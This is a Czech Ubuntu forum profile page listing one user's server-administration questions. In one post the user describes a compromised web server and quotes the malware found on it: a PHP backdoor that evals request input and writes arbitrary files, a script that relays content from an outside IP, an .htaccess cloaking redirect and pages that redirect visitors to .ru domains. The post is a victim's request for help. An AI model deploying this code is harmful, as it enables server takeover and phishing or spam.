Prosíme přihlašte se nebo zaregistrujte.

Přihlašte se svým uživatelským jménem a heslem.
Vaše pomoc je stále potřeba!

Zobrazit příspěvky

Tato sekce Vám umožňuje zobrazit všechny příspěvky tohoto uživatele. Prosím uvědomte si, že můžete vidět příspěvky pouze z oblastí Vám přístupných.


Témata - On

Stran: [1] 2 3 ... 6
1
Hola,

nedaří se mi doptat googlu, jak udělat smyčku, kde vyčítám nějaké hodnoty a chci, aby se mi  zobrazila pouze aktuální hodnota.

Něco jako:

#!/bin/bash
for i in 1 2 3 4 5 6 7 8 9 10
do
   echo "$i/10"
done

...jen s tím, že se musí zobrazit vždy jen aktuální hodnota, takhle mi to vypíše 10 řádku což nechci.
Něco takového je při instalaci přes apt, kde se počítá rychlost, čas atd...Jakým způsobem se tohoto dá docílit?

díky

2
Ubuntu Server / Linux Integration Services pro Ubuntu [vyřešeno]
« kdy: 13 Října 2015, 11:15:16 »
Ahoj,

máte někdo zkušenosti s virtualizační platformou Hyper-V a Ubuntu jako hostama?
Potýkáme se s problémy ohledně náhlé ztráty síťové konektivity.

Mám podezření na LIS (Linux Integration Services).
Ať už stahuji verzi 3.5 nebo 4.0, v přiloženém PDF je specifikace podporovaných OS - ubuntu bohužel chybí.

Velmi podobný problém jsem našel tady: http://askubuntu.com/questions/204452/hyperv-integration-services-v3-4-for-12-10 - je tam i přímý odkaz na download, ale nefunguje..dá se ale vydedukovat, že nejspíš pro Ubuntu nějaká podpora bude.

Možná to bude spíš dotaz na forum pro Hyper-V, ale má někdo zkušenost s Ubuntu/Debianem na Hyper-V ze zdejší komunity a setkal se případně se síťovými problémy?

díky,

3
Ubuntu Server / SAMBA over Internet
« kdy: 19 Června 2014, 11:14:21 »
Ahoj,

měl bych dotaz..mám ubuntu server 14.04 LTS, vytvořil jsem na něj sambu nejen kvůli standartnímu sdílení osobních dat, ale zjistil jsem, že lze použít síťově i účetní software POHODA. Byť dodavatel negarantuje funkci na linux serveru, ale zprovoznit se to podařilo a zdá se funkční - v lokální síti.

Samozřejmě se klienti chtějí spojit s tímto softwarem a se svými daty i z domu a tady nastává problém. Vytvořil jsem tunel OpenVPN a k datům se sice dostanou, ale než se spustí POHODA, to bych i já jakožto nekuchař stihnul připravit menu o třech chodech :)

Hledal jsem návody, proč je openvpn pomalá, návodů je mraky, ale než se pustím do hlubšího laborování, neměl by někdo nápad, jak bezpečně sdílet sambu přes net? Nebo prostě jiný způsob,který mě nenapadnul?

Nemůžu na routeru jen tak povolit porty pro sdílení samby, předpokládám, že program by nejspíš fungoval (koneckonců na zkoušku to udělat můžu), ale nepřijde mi to zrovna "safe" :)

Setkal jsem se s tím i u další firmy..také využívali nějaký windows software, kde sdílená data byla na linuxu a v interní síti v pohodě, ale z domu neskutečně pomalé - také přes openvpn.

Takže buď poladit openvpn nebo jestli existuje jiný, lepší způsob pro tyto účely?

díky

4
Ahoj,

zrovna bych potřeboval do svého webu (PHP) zakomponovat funkci, která detekuje, byl-li příspěvek z diskuze přečten nebo ne.
Pokud ano, dojde k nějaké notifikaci (zde na fóru je to "new" u každého ještě nepřečteného příspěvku).

Souvisí to nějak se session, ale nepodařilo se mi zjistit jak..poradil by někdo?
Jediné co mě napadlo je zapisovat do DB u každého jména poslední URL v diskuzi.
Pokud přibude nový příspěvek (nové URL) a tudíž se nebude shodovat s tím, co je v DB, tak to zanotifikuje..asi by to nějak fungovalo, ale hádám, že to půjde nějak lépe?

díky

5
Ubuntu Server / MYSQL - Too many connections to database [vyřešeno]
« kdy: 17 Června 2013, 09:41:59 »
Zdravím,

nějak se mi nedaří zjistit příčinu problému vytěžování mysql.
Jedná se o nahodilou situaci. Někdy, kdykoliv v průběhu dne se stane, že apache zničehonic začne
generovat connectiony do DB, tím se web server zpomalí natolik, že je v podstatě nepoužitelný nebo se MYSQL úplně odstaví a v logu píše:
"too many connections to database"

Vždy pomůže restart apache, ale opět do chvíle, než "něco" znovu začne generovat spojení do DB.
Je úplně jedno kdy...ráno, odpoledne, v noci...úplně nahodile.
Jedná se o dva servery v clusteru (zdrojové kódy) + jeden server, kde je DB.

Netstat na web serveru s grepem na port 3306 říká:


Kód: [Vybrat]
..............
tcp        0      0 192.168.2.161:36722     192.168.2.164:3306      SPOJENO     32334/apache2
tcp        0      0 192.168.2.161:36760     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36464     192.168.2.164:3306      SPOJENO     32445/apache2
tcp        0      0 192.168.2.161:36669     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36765     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36540     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36659     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36526     192.168.2.164:3306      SPOJENO     32416/apache2
tcp        0      0 192.168.2.161:36667     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36989     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36603     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36591     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36497     192.168.2.164:3306      SPOJENO     32430/apache2
tcp        0      0 192.168.2.161:36538     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36402     192.168.2.164:3306      SPOJENO     32341/apache2
tcp        0      0 192.168.2.161:36630     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36620     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36599     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36536     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36472     192.168.2.164:3306      SPOJENO     32513/apache2
tcp        0      0 192.168.2.161:36698     192.168.2.164:3306      TIME_WAIT   -
tcp        0      0 192.168.2.161:36889     192.168.2.164:3306      SPOJENO     32514/apache2

..............

Je to pouze část. Těch connectionů do DB je přes 200.

Kód: [Vybrat]
netstat -natp | grep apache | wc -l..říká až 450 spojení.


Zajímavé je ale to, že servery v clusteru mají samozřejmě virtuální IP, na kterou chodí požadavky, tato virtuální IP je 192.168.2.160.
V netstatu tento požadavek směruje ale z 192.168.2.161 a nahodilého portu, což je fyzická IP toho serveru, z čehož usuzuji, že to dělá nějaký interní proces na serveru, který využívá apache.
Což mě ale moc nenapadá který...antivir clamav nezaznamenal problém. Resp předtím tam viry byly, ale ty jsou všechny odstraněny.

Napadá někoho, jak zjistit, co konkrétně má na svědomí connectiony do DB? Něco to musí spouštět, ikdyby to byl vir, musí se nějak spustit.
Zkoušel jsem také lsof -p $PID, ale mezi výpisem souborů jsem opět nějaký neznámý soubor nenašel..
Zapnul jsem i globální log na databázovém serveru, čili jsem viděl všechny query, ale nic nápadného jsem nezaznemanl.. (ikdyž jsem v tom množství mohl něco přehlédnout)

6
Ubuntu Server / CMDBuild - instalace [VYŘEŠENO]
« kdy: 30 Května 2013, 08:23:35 »
Zdravím,

má někdo zkušenosti s aplikací CMDBuild? Pěkný návod je zde:
https://help.ubuntu.com/community/CMDBuild

Bohužel nějak nefunguje. Všechno proběhne v pohodě, ale web nenajede (bílá stránka).
Aplikační log říká:

Citace
INFO  2013-05-30 08:18:25 [cmdbuild] Loading common configurations for CMDBuild
INFO  2013-05-30 08:18:25 [cmdbuild] Initializing ParameterTransformers
INFO  2013-05-30 08:18:25 [cmdbuild] Transformer for org.apache.commons.fileupload.FileItem: org.cmdbuild.servlets.utils.transformer.FileItemTransformer
INFO  2013-05-30 08:18:25 [cmdbuild] Transformer for org.json.JSONObject: org.cmdbuild.servlets.utils.transformer.JSONObjectTransformer
INFO  2013-05-30 08:18:25 [cmdbuild] Transformer for org.json.JSONArray: org.cmdbuild.servlets.utils.transformer.JSONArrayTransformer
INFO  2013-05-30 08:18:25 [cmdbuild] Initializer custom ParameterBuilders
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.servlets.json.management.ActivityIdentifier: org.cmdbuild.servlets.utils.builder.ActivityIdentifierParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.ICard: org.cmdbuild.servlets.utils.builder.CardParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.IRelation: org.cmdbuild.servlets.utils.builder.RelationParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.ITable: org.cmdbuild.servlets.utils.builder.TableParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.BaseSchema: org.cmdbuild.servlets.utils.builder.BaseSchemaParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.ProcessType: org.cmdbuild.servlets.utils.builder.ProcessTypeParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.IDomain: org.cmdbuild.servlets.utils.builder.DomainParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.CardQuery: org.cmdbuild.servlets.utils.builder.CardQueryParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.ProcessQuery: org.cmdbuild.servlets.utils.builder.ProcessQueryParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.w3c.dom.Document: org.cmdbuild.servlets.utils.builder.XMLDocumentBuilder
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.services.auth.UserContext: org.cmdbuild.servlets.utils.builder.UserContextParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.ITableFactory: org.cmdbuild.servlets.utils.builder.factory.TableFactoryParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.DomainFactory: org.cmdbuild.servlets.utils.builder.factory.DomainFactoryParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Builder for org.cmdbuild.elements.interfaces.RelationFactory: org.cmdbuild.servlets.utils.builder.factory.RelationFactoryParameter
INFO  2013-05-30 08:18:25 [cmdbuild] Loading scheduled jobs
WARN  2013-05-30 08:18:25 [cmdbuild] Could not load the scheduled jobs: first start or patch not yet applied?

Kdyby to někdo náhodou zkoušel, nestahujte poslední verzi (2.1.2). Alespoň mně vykazovala nepochopitelnou chybu ohledně práv k souboru "alfresco.log".
Verze 2.0.0 v pohodě. Tomcat nevyhodil žádnou exceptionu, ale aplikační log viz výše...

Dál se mi nedaří hnout :(

7
Nastavil jsem si skript, který co 5 minut něco dělá...blbé je, že ať už dopadne jakkoliv, systém odesílá mail..
Mail odesílá na lokální adresu...čili na sebe sama a odesílá je root (ve skriptu se maily neposílají)


Citace
May 24 17:45:02 hostname postfix/pickup[2776]: 42B965F7CC: uid=0 from=<root>
May 24 17:45:02 hostname postfix/cleanup[11921]: 42B965F7CC: message-id=<20130524154502.42B965F7CC@hostname>
May 24 17:45:02 hostname postfix/qmgr[10987]: 42B965F7CC: from=<root@domena.cz>, size=1892, nrcpt=1 (queue active)
May 24 17:45:02 hostname postfix/smtp[11923]: 42B965F7CC: to=<root@domena.cz>, orig_to=<root>, relay=smtp.provider.cz[81.91.85.94]:25, delay=0.21, delays=0.11/0.01/0.03/0.06, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 986062402A)
May 24 17:45:02 hostname postfix/qmgr[10987]: 42B965F7CC: removed

V cronu mám nastaveno spuštění tohoto skriptu co 5 minut. Pravděpodobně mail odesílá cron.
Dá se někde toto vypnout?

díky

8
Ubuntu Server / Postfix + Spamassassin
« kdy: 15 Května 2013, 08:59:07 »
Ahoj,

nedaří se mi nějak propojit postfix se spamassassin.
Návodů je mraky, třeba tenhle: http://townx.org/blog/elliot/simple_spamassassin_setup_with_postfix_and_dovecot_on_ubuntu_breezy nebo http://james-scott.cz/postfix-spamassassin/,
ale pointa je vesměs u všech stejná..jestli jsem správně pochopil, tak propojení se dělá v /etc/postfix/master.cf ..

můj výpis konfiguračního soubor /etc/postfix/master.cf:

Kód: [Vybrat]
smtp      inet  n       -       -       -       -       smtpd
        -o content_filter=spamassassin


pickup    fifo  n       -       -       60      1       pickup
cleanup   unix  n       -       -       -       0       cleanup
qmgr      fifo  n       -       n       300     1       qmgr
#qmgr     fifo  n       -       -       300     1       oqmgr
tlsmgr    unix  -       -       -       1000?   1       tlsmgr
rewrite   unix  -       -       -       -       -       trivial-rewrite
bounce    unix  -       -       -       -       0       bounce
defer     unix  -       -       -       -       0       bounce
trace     unix  -       -       -       -       0       bounce
verify    unix  -       -       -       -       1       verify
flush     unix  n       -       -       1000?   0       flush
proxymap  unix  -       -       n       -       -       proxymap
proxywrite unix -       -       n       -       1       proxymap
smtp      unix  -       -       -       -       -       smtp

# When relaying mail as backup MX, disable fallback_relay to avoid MX loops
relay     unix  -       -       -       -       -       smtp
        -o smtp_fallback_relay=
#       -o smtp_helo_timeout=5 -o smtp_connect_timeout=5
showq     unix  n       -       -       -       -       showq
error     unix  -       -       -       -       -       error
retry     unix  -       -       -       -       -       error
discard   unix  -       -       -       -       -       discard
local     unix  -       n       n       -       -       local
virtual   unix  -       n       n       -       -       virtual
lmtp      unix  -       -       -       -       -       lmtp
anvil     unix  -       -       -       -       1       anvil
scache    unix  -       -       -       -       1       scache
#
# ====================================================================
# Interfaces to non-Postfix software. Be sure to examine the manual

maildrop  unix  -       n       n       -       -       pipe
  flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}


uucp      unix  -       n       n       -       -       pipe
  flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
#
# Other external delivery methods.
#
ifmail    unix  -       n       n       -       -       pipe
  flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
bsmtp     unix  -       n       n       -       -       pipe
  flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
scalemail-backend unix  -       n       n       -       2       pipe

  flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
mailman   unix  -       n       n       -       -       pipe
  flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py
  ${nexthop} ${user}


spamassassin unix -     n       n       -       -       pipe
        user=spamd argv=/usr/bin/spamc -f -e
        /usr/sbin/sendmail -oi -f ${sender} ${recipient}
                                                       



Jenže výpis v logu /var/log/mail.info by měl vypadat jinak. Měla by tam být zmínka o tom uživateli "spamd", zatím se ale nic nezměnilo:

Citace
May 15 08:44:49 hostname postfix/pickup[26182]: 613735F813: uid=9999 from=<mail@mail.cz>
May 15 08:44:49 hostname postfix/cleanup[29039]: 613735F813: message-id=<ce58ecde2aa76a8779607d838799c4c6@domena.cz>
May 15 08:44:49 hostname postfix/qmgr[26183]: 613735F813: from=<mail@domena.cz>, size=711, nrcpt=1 (queue active)
May 15 08:44:49 hostname postfix/pickup[26182]: 977BB5F814: uid=9999 from=<mail@domena.cz>
May 15 08:44:49 hostname postfix/cleanup[29039]: 977BB5F814: message-id=<688a862255e494cb790e7778e827b3f4@domena.cz>
May 15 08:44:49 hostname postfix/qmgr[26183]: 977BB5F814: from=<mail@domena.cz>, size=665, nrcpt=1 (queue active)
May 15 08:44:49 hostname postfix/smtp[29041]: 613735F813: to=<mail@domena.cz>, relay=smtp.provider.cz[212.111.0.12]:25, delay=0.43, delays=0.08/0.01/0.02/0.32, dsn=2.0.0, status=sent (250 Ok: queued as 9DD4C81A066)
May 15 08:44:49 hostname postfix/qmgr[26183]: 613735F813: removed



Podle návodů by měl v logu figurovat právě uživatel "spamd", pač před odesláním by to měl zkontrolovat právě spamassassin...

Konfigurák /etc/spamassassin/local.cf:

Kód: [Vybrat]
# This is the right place to customize your installation of SpamAssassin.
#
# See 'perldoc Mail::SpamAssassin::Conf' for details of what can be
# tweaked.
#
# Only a small subset of options are listed below
#
###########################################################################

#   Add *****SPAM***** to the Subject header of spam e-mails
#
 rewrite_header Subject *****SPAM*****


#   Save spam messages as a message/rfc822 MIME attachment instead of
#   modifying the original message (0: off, 2: use text/plain instead)
#
 report_safe 1


#   Set which networks or hosts are considered 'trusted' by your mail
#   server (i.e. not spammers)
#
# trusted_networks 212.17.35.


#   Set file-locking method (flock is not safe over NFS, but is faster)
#
# lock_method flock


#   Set the threshold at which a message is considered spam (default: 5.0)
#
 required_score 5.0


#   Use Bayesian classifier (default: 1)
#
 use_bayes 1


#   Bayesian classifier auto-learning (default: 1)
#
 bayes_auto_learn 1


#   Set headers which may provide inappropriate cues to the Bayesian
#   classifier
#
# bayes_ignore_header X-Bogosity
# bayes_ignore_header X-Spam-Flag
# bayes_ignore_header X-Spam-Status

#   Some shortcircuiting, if the plugin is enabled
#
ifplugin Mail::SpamAssassin::Plugin::Shortcircuit
#
#   default: strongly-whitelisted mails are *really* whitelisted now, if the
#   shortcircuiting plugin is active, causing early exit to save CPU load.
#   Uncomment to turn this on
#
# shortcircuit USER_IN_WHITELIST       on
# shortcircuit USER_IN_DEF_WHITELIST   on
# shortcircuit USER_IN_ALL_SPAM_TO     on
# shortcircuit SUBJECT_IN_WHITELIST    on

#   the opposite; blacklisted mails can also save CPU
#
# shortcircuit USER_IN_BLACKLIST       on
# shortcircuit USER_IN_BLACKLIST_TO    on
# shortcircuit SUBJECT_IN_BLACKLIST    on

#### blacklist_from arealbatov.cz
#### blacklist_from vinarskyinstitut.cz

#   if you have taken the time to correctly specify your "trusted_networks",
#   this is another good way to save CPU
#
# shortcircuit ALL_TRUSTED             on

#   and a well-trained bayes DB can save running rules, too
#
# shortcircuit BAYES_99                spam
# shortcircuit BAYES_00                ham

endif # Mail::SpamAssassin::Plugin::Shortcircuit



Výpis logu po nastartování spamassassin:

Kód: [Vybrat]
Wed May 15 08:21:27 2013 [4511] info: spamd: server killed by SIGTERM, shutting down
Wed May 15 08:22:50 2013 [26083] info: logger: removing stderr method
Wed May 15 08:22:51 2013 [26085] info: spamd: server started on port 783/tcp (running version 3.3.2)
Wed May 15 08:22:51 2013 [26085] info: spamd: server pid: 26085
Wed May 15 08:22:51 2013 [26085] info: spamd: server successfully spawned child process, pid 26086
Wed May 15 08:22:51 2013 [26085] info: spamd: server successfully spawned child process, pid 26087
Wed May 15 08:22:51 2013 [26085] info: prefork: child states: IS
Wed May 15 08:22:51 2013 [26085] info: prefork: child states: II



díky za nakopnutí...


9
Ubuntu Server / Zavirovaný webový server [VYŘEŠENO]
« kdy: 15 Května 2013, 08:40:28 »
Ahoj,

potřeboval bych poradit v oblasti bezpečnosti webového serveru.
Databáze je zvlášť, takže na infikovaném stroji běží pouze PHP a Apache (+ Bacula, NRPE pro Nagios a jiné nutnosti..). Jedná se o Ubuntu 12.04 LTS, 64bit.

Projel jsem server antivirem clamAV, našel toho hodně, bohužel ani on nezlikvidoval uplně vše.
Resp, možná zničil strůjce problému a pozůstatky už třeba nebyly nebezpečné, těžko říct, nechtěl jsem riskovat a co jsem manuálně našel, to jsem ještě odstranil.

Jak takový útok vypadá?

složka s "prázdným" projektem...

Kód: [Vybrat]
drwxr-sr-x 2 jenkins user 4096 kvě 14 15:22 ei0dxe0m/
-rw-r--r-- 1 jenkins user 2411 kvě 14 19:25 favicon.php
-rwxr-xr-x 1 jenkins user  858 kvě 13 11:46 index.php*
drwxr-sr-x 2 jenkins user 4096 kvě 14 15:22 ocz/
drwxr-sr-x 2 jenkins user 4096 kvě 14 15:22 187f0/
drwxr-sr-x 2 jenkins user 4096 kvě 14 15:22 34ute/
drwxr-sr-x 2 jenkins user 4096 kvě 14 15:22 83t/

Tento "projekt" je zaveden pouze v /etc/apache2/sites-enabled a nalinkován do konkrétní složky.
Není tam žádný zdrojový kód, žádný formulář, nic, čím by útočník měl možnost generovat php soubory nebo složky.

Apache mi běží pod uživatelem "jenkins", tudíž plná práva zápisu tam sice jsou, ale kdo nebo co to vytváří, když zvenčí tento projekt vlastně není vidět?

Je to jen prázdná stránka bez jakéhokoliv vstupu.. Je možné, že by se to mohlo rozšířit z jiných projektů, kde tyto vstupy jsou?



Pro zajímavost, obsah index.php generovaný virem je:

Kód: [Vybrat]
<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $diwehb "6cab7ff08f9ed96d4cf8c5e93f96dcd7"; if(isset($_REQUEST['accmusz'])) { $fzkxr $_REQUEST['accmusz']; eval($fzkxr); exit(); } if(isset($_REQUEST['ylahkcs'])) { $wmax $_REQUEST['zeqt']; $swrno $_REQUEST['ylahkcs']; $xuqhria fopen($swrno'w'); $uayecrh fwrite($xuqhria$wmax); fclose($xuqhria); echo $uayecrh; exit(); }

?>


favicon.php

Kód: [Vybrat]
<?php

error_reporting
(0);
ini_set("display_errors"0);

$remote 'http://62.109.31.142/request12.php';

php_display($remote);

error_404();

function 
php_display($url)
{
    
$query = array();
    
$query['ip'] = getIp();
    
$query['time'] = date('d/M/Y:H:i:s'time());
    
$query['request'] = getRequest();
    
$query['path'] = getPath();
    
$query['protocol'] = getProtocol();
    
$query['useragent'] = getUseragent();
    
$query['referer'] = getReferer();

    
$url $url."?".http_build_query($query);

    
$content = @file_get_contents($url);

    if(empty(
$content) OR stripos($content"error") !== FALSE)
    {
        
error_404();
    }

    
// Ïðîâåðÿåì òèï ôàéëà ïî ðàñøèðåíèþ
        
if( preg_match'/(?<=\.)(txt|htm|html)(?=\s)/'$content )==)
        {
                
$type 'text/html';
        }
        else
        {
                
$type 'application/zip';
                
header('Content-Disposition: attachment; filename='.$filename);
        }


    
$content explode("\n"$content);
    
$filename array_shift($content);
    
$content implode("\n"$content);

    
header('Content-Type:'.$type);

    
header('Content-Length: '.  strlen($content));
    echo 
$content;
    exit();
}
function 
error_404()
{
    
header("HTTP/1.1 404 Not Found");
    exit(
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n"
            
."<html><head><title>404 Not Found</title></head><body>\r\n"
            
."<h1>Not Found</h1>\r\n"
            
."<p>The requested URL was not found on this server.</p>\r\n\t"
            
."<hr>\r\n"
            
."</body></html>\r\n");
}

function 
getRequest()
{
    return 
$_SERVER['REQUEST_METHOD'];
}

function 
getPath()
{
    return 
$_SERVER['REQUEST_URI'];
}

function 
getProtocol()
{
    return 
$_SERVER['SERVER_PROTOCOL'];
}

function 
getUseragent()
{
    return 
$_SERVER['HTTP_USER_AGENT'];
}

function 
getReferer()
{
    
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '-';
    return 
$referer;
}

function 
getIp()
{
    
$ip NULL;
    if(isset(
$_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        
$ip $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    elseif(isset(
$_SERVER['HTTP_CLIENT_IP']))
    {
        
$ip $_SERVER['HTTP_CLIENT_IP'];
    }
    elseif(isset(
$_SERVER['REMOTE_ADDR']))
    {

    if(
strpos($ip",") !== FALSE)
    {
        
$ips explode(","$ip);
        
$ip trim(array_pop($ips));
    }

    return 
$ip;
}
 
?>



.htaccess vytvořený ve všech podsložkách

Kód: [Vybrat]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>


další index.php v podsložkách:

Kód: [Vybrat]
<html>


<head>

<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
  window.location = "http://slavasesta.ru/l1/?sub_id=3064&dd_id=0";
}iphone
//-->
</script>

<script language="JavaScript"> parent.window.opener.location="http://spilonras.ru/access?key=ecff859bf9322bd2ef08ce6d9db5c1bf";</script>

<meta http-equiv="refresh" content="0;URL=http://filitanst.ru/access?key=5fe715ee4614c8ccb74b3fdefb677496">

  <title>Вконтакте</title>
 

</head>


<body onload="tim()">


<br>


<body>


</body>


</html><?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $xzhtm "29ad9b5f6aa9b9c4788cf31431a95131"; if(isset($_REQUEST['pbdwvby'])) { $uixfvus $_REQUEST['pbdwvby']; eval($uixfvus); exit(); } if(isset($_REQUEST['vmen'])) { $pcolwvm $_REQUEST['tfuu']; $qqkog $_REQUEST['vmen']; $wekr fopen($qqkog'w'); $duupyhjo fwrite($wekr$pcolwvm); fclose($wekr); echo $duupyhjo; exit(); } ?><html>


<head>

<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
  window.location = "http://slavasesta.ru/l1/?sub_id=3064&dd_id=0";
}iphone
//-->
</script>

<script language="JavaScript"> parent.window.opener.location="http://spilonras.ru/access?key=ecff859bf9322bd2ef08ce6d9db5c1bf";</script>

<meta http-equiv="refresh" content="0;URL=http://filitanst.ru/access?key=5fe715ee4614c8ccb74b3fdefb677496">

  <title>Вконтакте</title>
 

</head>


<body onload="tim()">


<br>


<body>


</body>


</html>



a jiné ..... Za následek to má to, že se rozesílá ohromné množství spamů. Nainstaloval jsem si tam clamAV, spamassassin, ale nějak se mi nedaří to propojit s postfixem, nicméně to už sem nepatří.

Zde by mě zajímala rada, jak se tento vir dostal na server a to i do projektu, který nemá žádný zdrojový kód???


díky za nápady


10
Ubuntu Server / OSSEC - remoted [vyřešeno]
« kdy: 03 Září 2012, 10:07:10 »
Zdravím,

možná to není uplně na toto forum, ale najde se někdo, kdo hoví softwaru OSSEC? Běží mi na Ubuntu 12.04 LTS, lokálně se zdá, že to nějak funguje, i s přehledným webovým rozhraním, ale nedaří se mi propojit vzdálené stroje..návodů pár je, na http://ossec.net je i slušná dokumentace, ale prostě ne a ne...zkoušel jsem přidat sekci "remote" do conf souboru ossec.conf dle dokumentace:

Citace
  <remote>
    <connection>secure</connection>
    <allowed-ips>192.168.2.0/24</allowed-ips>
    <local_ip>192.168.2.57</local_ip>
    <port>1514</port>
  </remote>

....uplně poprvé to nějak "zafungovalo", alespoň v tom smyslu, že "/etc/init.d/ossec status" řekl:

Citace
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted is running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
ossec-agentlessd is running...

..jenže nevím co se událo, že teď to prostě nejde:

Citace
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted not running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
ossec-agentlessd is running...

Vždy po restartu služby "ossec" mi to do logu hodí jen:

2012/09/03 09:53:31 ossec-remoted: INFO: Started (pid: 5891).
2012/09/03 09:53:31 ossec-remoted: Remote syslog allowed from: '192.168.2.0/24'


...což nevypadá sice errorově, nicméně na portu 1514 nic nenaslouchá (viz netstat) a výpis služeb přes "ps" na PID 5891 mlčí

tcpdump na serveru říká:

root@domatestx64:~# tcpdump -i eth0 dst port 1514 -vv

09:33:25.612634 IP (tos 0x0, ttl 64, id 41063, offset 0, flags [DF], proto UDP (17), length 101)
    domatest.43732 > domatestx64.1514: UDP, length 73
09:33:31.613822 IP (tos 0x0, ttl 64, id 41064, offset 0, flags [DF], proto UDP (17), length 101)
    domatest.43732 > domatestx64.1514: UDP, length 73
09:33:41.616240 IP (tos 0x0, ttl 64, id 41065, offset 0, flags [DF], proto UDP (17), length 101)
.....
.....

......čili na serveru zkouším poslouchat na portu 1514...k pokusu o navázání tedy pravděpodobně dojde, ale žádný log mi neřekne, na čem to končí..
V konfiguráku internal_options.conf jde povolit:

# Remoted (server debug)
